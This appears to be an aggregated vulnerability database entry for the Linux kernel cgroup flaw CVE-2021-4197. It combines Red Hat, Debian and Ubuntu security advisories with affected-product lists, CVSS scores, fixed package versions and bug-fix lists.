- kernel: race condition in perf_event_open leads to privilege escalation (CVE-2022-1729)

- kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root (CVE-2022-32250)

- kernel: cgroup: Use open-time creds and namespace for migration perm checks (CVE-2021-4197)

- kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses (CVE-2021-4203)

- kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check (CVE-2020-29368)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Bug Fix(es):
- kernel-rt: update RT source tree to the RHEL-8.4.z10 source tree (BZ#2087922)

- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect. Bugs fixed (https://bugzilla.redhat.com/):
1903244 - CVE-2020-29368 kernel: the copy-on-write implementation can grant unintended write access because of a race condition in a THP mapcount check 2035652 - CVE-2021-4197 kernel: cgroup: Use open-time creds and namespace for migration perm checks 2036934 - CVE-2021-4203 kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses 2064604 - CVE-2022-1012 kernel: Small table perturb size in the TCP source port generation algorithm can lead to information leak 2086753 - CVE-2022-1729 kernel: race condition in perf_event_open leads to privilege escalation 2092427 - CVE-2022-32250 kernel: a use-after-free write in the netfilter subsystem can lead to privilege escalation to root
- Package List:
Red Hat Enterprise Linux Real Time for NFV EUS (v.8.4):
Source: kernel-rt-4.18.0-305.57.1.rt7.129.el8_4.src.rpm
x86_64: kernel-rt-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-kvm-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-kvm-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm
Red Hat Enterprise Linux Real Time EUS (v.8.4):
Source: kernel-rt-4.18.0-305.57.1.rt7.129.el8_4.src.rpm
x86_64: kernel-rt-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-core-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debug-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debuginfo-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-debuginfo-common-x86_64-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-devel-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-modules-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm kernel-rt-modules-extra-4.18.0-305.57.1.rt7.129.el8_4.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- Summary:
The Migration Toolkit for Containers (MTC) 1.7.2 is now available. Description:
The Migration Toolkit for Containers (MTC) enables you to migrate Kubernetes resources, persistent volume data, and internal container images between OpenShift Container Platform clusters, using the MTC web console or the Kubernetes API. Bugs fixed (https://bugzilla.redhat.com/):
2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes 2038898 - [UI] "Update Repository" option not getting disabled after adding the Replication Repository details to the MTC web console 2040693 - "Replication repository" wizard has no validation for name length 2040695 - [MTC UI] "Add Cluster" wizard gets stuck when the cluster name length is more than 63 characters 2044591 - CVE-2022-0235 node-fetch: exposure of sensitive information to an unauthorized actor 2048537 - Exposed route host to image registry? connecting successfully to invalid registry "xyz.com" 2053259 - CVE-2022-0536 follow-redirects: Exposure of Sensitive Information via Authorization Header leak 2055658 - [MTC UI] Cancel button on "Migrations" page does not disappear when migration gets Failed/Succeeded with warnings 2056962 - [MTC UI] UI shows the wrong migration type info after changing the target namespace 2058172 - [MTC UI] Successful Rollback is not showing the green success icon in the "Last State" field. 2058529 - [MTC UI] Migrations Plan is missing the type for the state migration performed before upgrade 2061335 - [MTC UI] "Update cluster" button is not getting disabled 2062266 - MTC UI does not display logs properly [OADP-BL] 2062862 - [MTC UI] Clusters page behaving unexpectedly on deleting the remote cluster's service account secret from backend 2074675 - HPAs of DeploymentConfigs are not being updated when migration from Openshift 3.x to Openshift 4.x 2076593 - Velero pod log missing from UI drop down 2076599 - Velero pod log missing from downloaded logs folder [OADP-BL] 2078459 - [MTC UI] Storageclass conversion plan is adding migstorage reference in migplan 2079252 - [MTC] Rsync options logs not visible in log-reader pod 2082221 - Don't allow Storage class conversion migration if source cluster has only one storage class defined [UI] 2082225 - non-numeric user when launching stage pods [OADP-BL] 2088022 - Default CPU requests on Velero/Restic are too demanding making scheduling fail in certain environments 2088026 - Cloud propagation phase in migration controller is not doing anything due to missing labels on Velero pods 2089126 - [MTC] Migration controller cannot find Velero Pod because of wrong labels 2089411 - [MTC] Log reader pod is missing velero and restic pod logs [OADP-BL] 2089859 - [Crane] DPA CR is missing the required flag - Migration is getting failed at the EnsureCloudSecretPropagated phase due to the missing secret VolumeMounts 2090317 - [MTC] mig-operator failed to create a DPA CR due to null values are passed instead of int [OADP-BL] 2096939 - Fix legacy operator.yml inconsistencies and errors 2100486 - [MTC UI] Target storage class field is not getting respected when clusters don't have replication repo configured
Show details on source website{
"affected_products": {
"_id": null,
"data": [
{
"_id": null,
"model": "h700s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.15"
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.11"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.4.189"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.19.238"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.15.14"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.1"
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.2.0"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "4.14.276"
},
{
"_id": null,
"model": "h410c",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "5.5"
},
{
"_id": null,
"model": "brocade fabric operating system",
"scope": "eq",
"trust": 1.0,
"vendor": "broadcom",
"version": null
},
{
"_id": null,
"model": "communications cloud native core binding support function",
"scope": "eq",
"trust": 1.0,
"vendor": "oracle",
"version": "22.1.3"
},
{
"_id": null,
"model": "kernel",
"scope": "lt",
"trust": 1.0,
"vendor": "linux",
"version": "5.10.111"
},
{
"_id": null,
"model": "linux",
"scope": "eq",
"trust": 1.0,
"vendor": "debian",
"version": "10.0"
},
{
"_id": null,
"model": "h300s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.20"
},
{
"_id": null,
"model": "h500s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": "eq",
"trust": 1.0,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": "gte",
"trust": 1.0,
"vendor": "linux",
"version": "4.2"
},
{
"_id": null,
"model": "h300s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h700s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h410c",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "h500s",
"scope": null,
"trust": 0.8,
"vendor": "netapp",
"version": null
},
{
"_id": null,
"model": "kernel",
"scope": null,
"trust": 0.8,
"vendor": "linux",
"version": null
},
{
"_id": null,
"model": "oracle communications cloud native core binding support function",
"scope": null,
"trust": 0.8,
"vendor": "\u30aa\u30e9\u30af\u30eb",
"version": null
},
{
"_id": null,
"model": "brocade fabric os",
"scope": null,
"trust": 0.8,
"vendor": "broadcom",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"credits": {
"_id": null,
"data": "Red Hat",
"sources": [
{
"db": "PACKETSTORM",
"id": "167330"
},
{
"db": "PACKETSTORM",
"id": "168019"
},
{
"db": "PACKETSTORM",
"id": "167822"
},
{
"db": "PACKETSTORM",
"id": "167679"
}
],
"trust": 0.4
},
"cve": "CVE-2021-4197",
"cvss": {
"_id": null,
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "CVE-2021-4197",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 7.2,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 3.9,
"id": "VHN-410862",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2021-4197",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Local",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2021-4197",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-4197",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2021-4197",
"trust": 0.8,
"value": "High"
},
{
"author": "VULHUB",
"id": "VHN-410862",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-410862"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-019487"
},
{
"db": "NVD",
"id": "CVE-2021-4197"
}
]
},
"description": {
"_id": null,
"data": "An unprivileged write to the file handler flaw in the Linux kernel\u0027s control groups and namespaces subsystem was found in the way users have access to some less privileged process that are controlled by cgroups and have higher privileged parent process. It is actually both for cgroup2 and cgroup1 versions of control groups. A local user could use this flaw to crash the system or escalate their privileges on the system. Linux Kernel There is an authentication vulnerability in.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. The Linux kernel is the kernel used by the American Linux Foundation\u0027s open source operating system Linux. Attackers can use this vulnerability to bypass the restrictions of the Linux kernel through Cgroup Fd Writing to elevate their privileges. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5127-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nMay 02, 2022 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : linux\nCVE ID : CVE-2021-4197 CVE-2022-0168 CVE-2022-1016 CVE-2022-1048\n CVE-2022-1158 CVE-2022-1195 CVE-2022-1198 CVE-2022-1199\n CVE-2022-1204 CVE-2022-1205 CVE-2022-1353 CVE-2022-1516\n CVE-2022-26490 CVE-2022-27666 CVE-2022-28356 CVE-2022-28388\n CVE-2022-28389 CVE-2022-28390 CVE-2022-29582\n\nSeveral vulnerabilities have been discovered in the Linux kernel that\nmay lead to a privilege escalation, denial of service or information\nleaks. The security impact is negligible as\n CAP_SYS_ADMIN inherently gives the ability to deny service. \n\nCVE-2022-1016\n\n David Bouman discovered a flaw in the netfilter subsystem where the\n nft_do_chain function did not initialize register data that\n nf_tables expressions can read from and write to. 
\n\nCVE-2022-1158\n\n Qiuhao Li, Gaoning Pan, and Yongkang Jia discovered a bug in the\n KVM implementation for x86 processors. A local user with access to\n /dev/kvm could cause the MMU emulator to update page table entry\n flags at the wrong address. \n\nCVE-2022-1199, CVE-2022-1204, CVE-2022-1205\n\n Duoming Zhou discovered race conditions in the AX.25 hamradio\n protocol, which could lead to a use-after-free or null pointer\n dereference. \n\nCVE-2022-1353\n\n The TCS Robot tool found an information leak in the PF_KEY\n subsystem. \n\nCVE-2022-1516\n\n A NULL pointer dereference flaw in the implementation of the X.25\n set of standardized network protocols, which can result in denial\n of service. \n\n This driver is not enabled in Debian\u0027s official kernel\n configurations. \n\nCVE-2022-26490\n\n Buffer overflows in the STMicroelectronics ST21NFCA core driver can\n result in denial of service or privilege escalation. \n\n This driver is not enabled in Debian\u0027s official kernel\n configurations. \n\nCVE-2022-27666\n\n \"valis\" reported a possible buffer overflow in the IPsec ESP\n transformation code. \n\nFor the stable distribution (bullseye), these problems have been fixed in\nversion 5.10.113-1. \n\nWe recommend that you upgrade your linux packages. 
\n\nFor the detailed security status of linux please refer to its security\ntracker page at:\nhttps://security-tracker.debian.org/tracker/linux\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmJwRg9fFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2\nNDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND\nz0S8bw//bsMGzd7yC5QHR9/G3Vxn10HSYSy9vkPdOrg9nt58xCygMTvj9G4Ur7P5\nSqPulxdczzDQgAEl/UVzmCifFMAbfi77w+0feha6zbrjz4yD8vtmk1caVmvbqOxE\nMsS7GKyFdRxvqWoCG1boIZZ5aKFCgXug4cY1nARJo4tadF3W3lZw9LP9+kdDJ0Z8\n4zfzd1fa0tn6Bk9lqVvaks3zVxLA2Iev0yaLGpWPbsrqiSEnB/e1tWAQX7CVRUNT\nkY48YpAsGraOyjTMkmLyeXNYHwdNYfKR27DK/4CpXeVzqADlMqKtFOp0lvQhF54t\nKcBvJjvQsJ5ua7qjoJS97SLlMp7aZ3DvBnz28hn3vDp5iqFDTdLSmuPqJGy5JAOD\nJdijjSFCB2tTjDLBha+1mGAB2kJG8Kj0rcEiQTyFARejOoCIQg9R3EWfp5HI8DCn\ne4fGZdRATm6Qe9ofBlVmKmVpV36NaiZuy3UA8lhKTlJsjIhwnFB/WknG93/G64HK\nwMSkbbXDPoYgH06emh0RIXzddfHHO+mZBgUysHBX5pE0KdDazPleFGn5yOdlX8k5\n5OT35Cga+hRVT9KNQfz4Me0AEt0kEwyMIUM6R49KvB8eQ9Az1OjO0yWONz4F5mDW\n0HoSJCW+9gZzljIebL+odSyT/dvUZpP/xVzE8DRukDyn99GY6y4=\n=vCuc\n-----END PGP SIGNATURE-----\n. ==========================================================================\nUbuntu Security Notice USN-5513-1\nJuly 13, 2022\n\nlinux-aws vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 ESM\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. 
\n\nSoftware Description:\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n\nDetails:\n\nNorbert Slusarek discovered a race condition in the CAN BCM networking\nprotocol of the Linux kernel leading to multiple use-after-free\nvulnerabilities. A local attacker could use this issue to execute arbitrary\ncode. (CVE-2021-3609)\n\nLikang Luo discovered that a race condition existed in the Bluetooth\nsubsystem of the Linux kernel, leading to a use-after-free vulnerability. A\nlocal attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2021-3752)\n\nIt was discovered that the NFC subsystem in the Linux kernel contained a\nuse-after-free vulnerability in its NFC Controller Interface (NCI)\nimplementation. A local attacker could possibly use this to cause a denial\nof service (system crash) or execute arbitrary code. (CVE-2021-3760)\n\nSzymon Heidrich discovered that the USB Gadget subsystem in the Linux\nkernel did not properly restrict the size of control requests for certain\ngadget types, leading to possible out of bounds reads or writes. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2021-39685)\n\nIt was discovered that the Ion Memory Manager subsystem in the Linux kernel\ncontained a use-after-free vulnerability. A local attacker could possibly\nuse this to cause a denial of service (system crash) or execute arbitrary\ncode. (CVE-2021-39714)\n\nEric Biederman discovered that the cgroup process migration implementation\nin the Linux kernel did not perform permission checks correctly in some\nsituations. (CVE-2021-4197)\n\nLin Ma discovered that the NFC Controller Interface (NCI) implementation in\nthe Linux kernel contained a race condition, leading to a use-after-free\nvulnerability. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. 
(CVE-2021-4202)\n\nSushma Venkatesh Reddy discovered that the Intel i915 graphics driver in\nthe Linux kernel did not perform a GPU TLB flush in some situations. A\nlocal attacker could use this to cause a denial of service or possibly\nexecute arbitrary code. (CVE-2022-0330)\n\nIt was discovered that the PF_KEYv2 implementation in the Linux kernel did\nnot properly initialize kernel memory in some situations. A local attacker\ncould use this to expose sensitive information (kernel memory). \n(CVE-2022-1353)\n\nIt was discovered that the virtual graphics memory manager implementation\nin the Linux kernel was subject to a race condition, potentially leading to\nan information leak. (CVE-2022-1419)\n\nMinh Yuan discovered that the floppy disk driver in the Linux kernel\ncontained a race condition, leading to a use-after-free vulnerability. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or execute arbitrary code. (CVE-2022-1652)\n\nIt was discovered that the Atheros ath9k wireless device driver in the\nLinux kernel did not properly handle some error conditions, leading to a\nuse-after-free vulnerability. A local attacker could use this to cause a\ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2022-1679)\n\nIt was discovered that the Marvell NFC device driver implementation in the\nLinux kernel did not properly perform memory cleanup operations in some\nsituations, leading to a use-after-free vulnerability. A local attacker\ncould possibly use this to cause a denial of service (system) or execute\narbitrary code. (CVE-2022-1734)\n\nIt was discovered that some Intel processors did not completely perform\ncleanup actions on multi-core shared buffers. A local attacker could\npossibly use this to expose sensitive information. (CVE-2022-21123)\n\nIt was discovered that some Intel processors did not completely perform\ncleanup actions on microarchitectural fill buffers. 
A local attacker could\npossibly use this to expose sensitive information. (CVE-2022-21125)\n\nIt was discovered that some Intel processors did not properly perform\ncleanup during specific special register write operations. A local attacker\ncould possibly use this to expose sensitive information. (CVE-2022-21166)\n\nIt was discovered that the USB Gadget file system interface in the Linux\nkernel contained a use-after-free vulnerability. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2022-24958)\n\n\u8d75\u5b50\u8f69 discovered that the 802.2 LLC type 2 driver in the Linux kernel did not\nproperly perform reference counting in some error conditions. (CVE-2022-28356)\n\nIt was discovered that the 8 Devices USB2CAN interface implementation in\nthe Linux kernel did not properly handle certain error conditions, leading\nto a double-free. (CVE-2022-28388)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 ESM:\n linux-image-4.4.0-1109-aws 4.4.0-1109.115\n linux-image-aws 4.4.0.1109.106\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. 
\n\nReferences:\n https://ubuntu.com/security/notices/USN-5513-1\n CVE-2021-3609, CVE-2021-3752, CVE-2021-3760, CVE-2021-39685,\n CVE-2021-39714, CVE-2021-4197, CVE-2021-4202, CVE-2022-0330,\n CVE-2022-1353, CVE-2022-1419, CVE-2022-1652, CVE-2022-1679,\n CVE-2022-1734, CVE-2022-21123, CVE-2022-21125, CVE-2022-21166,\n CVE-2022-24958, CVE-2022-28356, CVE-2022-28388\n. Summary:\n\nRed Hat OpenShift Container Platform release 4.9.45 is now available with\nupdates to packages and images that fix several bugs and add enhancements. \n\nThis release includes a security update for Red Hat OpenShift Container\nPlatform 4.9. \n\nRed Hat Product Security has rated this update as having a security impact\nof Important. A Common Vulnerability Scoring System (CVSS) base score,\nwhich gives a detailed severity rating, is available for each vulnerability\nfrom the CVE link(s) in the References section. \n\n2. Description:\n\nRed Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments. \n\nThis advisory contains the container images for Red Hat OpenShift Container\nPlatform 4.9.45. See the following advisory for the RPM packages for this\nrelease:\n\nhttps://access.redhat.com/errata/RHBA-2022:5878\n\nSpace precludes documenting all of the container images in this advisory. \nSee the following Release Notes documentation, which will be updated\nshortly for this release, for details about these changes:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nSecurity Fix(es):\n\n* openshift: oauth-serving-cert configmap contains cluster certificate\nprivate key (CVE-2022-2403)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s)\nlisted in the References section. 
\n\nYou may download the oc tool and use it to inspect release image metadata\nas follows:\n\n(For x86_64 architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.9.45-x86_64\n\nThe image digest is\nsha256:8ab373599e8a010dffb9c7ed45e01c00cb06a7857fe21de102d978be4738b2ec\n\n(For s390x architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.9.45-s390x\n\nThe image digest is\nsha256:1dde8a7134081c82012a812e014daca4cba1095630e6d0c74b51da141d472984\n\n(For ppc64le architecture)\n\n$ oc adm release info\nquay.io/openshift-release-dev/ocp-release:4.9.45-ppc64le\n\nThe image digest is\nsha256:ec1fac628bec05eb6425c2ae9dcd3fca120cd1a8678155350bb4c65813cfc30e\n\nAll OpenShift Container Platform 4.9 users are advised to upgrade to these\nupdated packages and images when they are available in the appropriate\nrelease channel. To check for available updates, use the OpenShift Console\nor the CLI oc command. Instructions for upgrading a cluster are available\nat\nhttps://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html\n\n3. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.9/updating/updating-cluster-cli.html\n\n4. 
Bugs fixed (https://bugzilla.redhat.com/):\n\n2009024 - Unable to complete cluster destruction, some ports are left over\n2055494 - console operator should report Upgradeable False when SAN-less certs are used\n2083554 - post 1.23 rebase: regression in service-load balancer reliability\n2087021 - configure-ovs.sh fails, blocking new RHEL node from being scaled up on cluster without manual reboot\n2088539 - Openshift route URLs starting with double slashes stopped working after update to 4.8.33 - curl version problems\n2091806 - Cluster upgrade stuck due to \"resource deletions in progress\"\n2095320 - [4.9] Bootimage bump tracker\n2097157 - [4.9z] During ovnkube-node restart all host conntrack entries are flushed, leading to traffic disruption\n2100786 - [OCP 4.9] Ironic cannot match \"wwn\" rootDeviceHint for a multipath device\n2101664 - disabling ipv6 router advertisements using \"all\" does not disable it on secondary interfaces\n2101959 - CVE-2022-2403 openshift: oauth-serving-cert configmap contains cluster certificate private key\n2103982 - [4.9] AWS EBS CSI driver stuck removing EBS volumes - GetDeviceMountRefs check failed\n2105277 - NetworkPolicies: ovnkube-master pods crashing due to panic: \"invalid memory address or nil pointer dereference\"\n2105453 - Node reboot causes duplicate persistent volumes\n2105654 - egressIP panics with nil pointer dereference\n2105663 - APIRequestCount does not identify some APIs removed in 4.9\n2106655 - Kubelet slowly leaking memory and pods eventually unable to start\n2108538 - [4.9.z backport] br-ex not created due to default bond interface having a different mac address than expected\n2108619 - ClusterVersion history pruner does not always retain initial completed update entry\n\n5. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2022 Red Hat, Inc. 
\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBYvKietzjgjWX9erEAQjQ7g/+Ok8sWBeaehUxS8YKMtNEdLzO8Eg5TKfA\n3MoORr+P+WZIQFy7pN/GeKojlsy1ApnNEnc7j0qC2dibUBfguOWEoAMdds07DwF3\nJw3iANT5sJZv3s4yT9FvYu9Wnwl/iYJ9w8iH19oePFFKg0QtxAWUvSlIvp2eSZ1L\nyw86wqAzASDqc86Y0fkIvmxopq80lyI//rNqPXsATKq1oGFRstQmfUz+2UxonlMC\ntVUfRJjlPDZDU57EpBcxWH/TVPV/JdvcQPQEOJ+u+ZVg2H4qEwptqpgjZ4upYbMJ\nAAIymXUwmX9QHOcXSOiZ+1DZMJawj5ezkqGwQIl919w3bX/m6peQPbBBoYbXLSrS\ngtRwgshIIZTs6AzOOVm6+XOSKGRR/C9i1YjNUBF6oY4s+wVtYJvtRwdNrKtH7pCT\nb0FMcLGG0yo/pGuMfB6zmgEn/tEL0IGqoSeN5avb+NObEDYWMGru4sBjdaA66wu4\n1JfPAP/yQ7rW0NXleJXjv9Xhdae7b8en9YxlsWLcp/QE8bppT6tjyIW/aVXEZZva\n/B1ACyosleJYYYYoqqbU97mCaG/LfH/fz7euD9GgJXOCjGNoHAkKe/DOXg7YTSZP\naDbtU3ZeESqyRpAJ8nkM4lZLFTxYNmDp+8tWMx6UXQnNRBOMW4bEQRtzTQB+vrWH\nfzoc8e3L82I=ARFk\n-----END PGP SIGNATURE-----\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://listman.redhat.com/mailman/listinfo/rhsa-announce\n. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Real Time EUS (v.8.4) - x86_64\nRed Hat Enterprise Linux Real Time for NFV EUS (v.8.4) - x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. 
\n\nSecurity Fix(es):\n\n* kernel: Small table perturb size in the TCP source port generation\nalgorithm can lead to information leak (CVE-2022-1012)\n\n* kernel: race condition in perf_event_open leads to privilege escalation\n(CVE-2022-1729)\n\n* kernel: a use-after-free write in the netfilter subsystem can lead to\nprivilege escalation to root (CVE-2022-32250)\n\n* kernel: cgroup: Use open-time creds and namespace for migration perm\nchecks (CVE-2021-4197)\n\n* kernel: Race condition in races in sk_peer_pid and sk_peer_cred accesses\n(CVE-2021-4203)\n\n* kernel: the copy-on-write implementation can grant unintended write\naccess because of a race condition in a THP mapcount check (CVE-2020-29368)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nBug Fix(es):\n\n* kernel-rt: update RT source tree to the RHEL-8.4.z10 source tree\n(BZ#2087922)\n\n4. Solution:\n\nFor details on how to apply this update, which includes 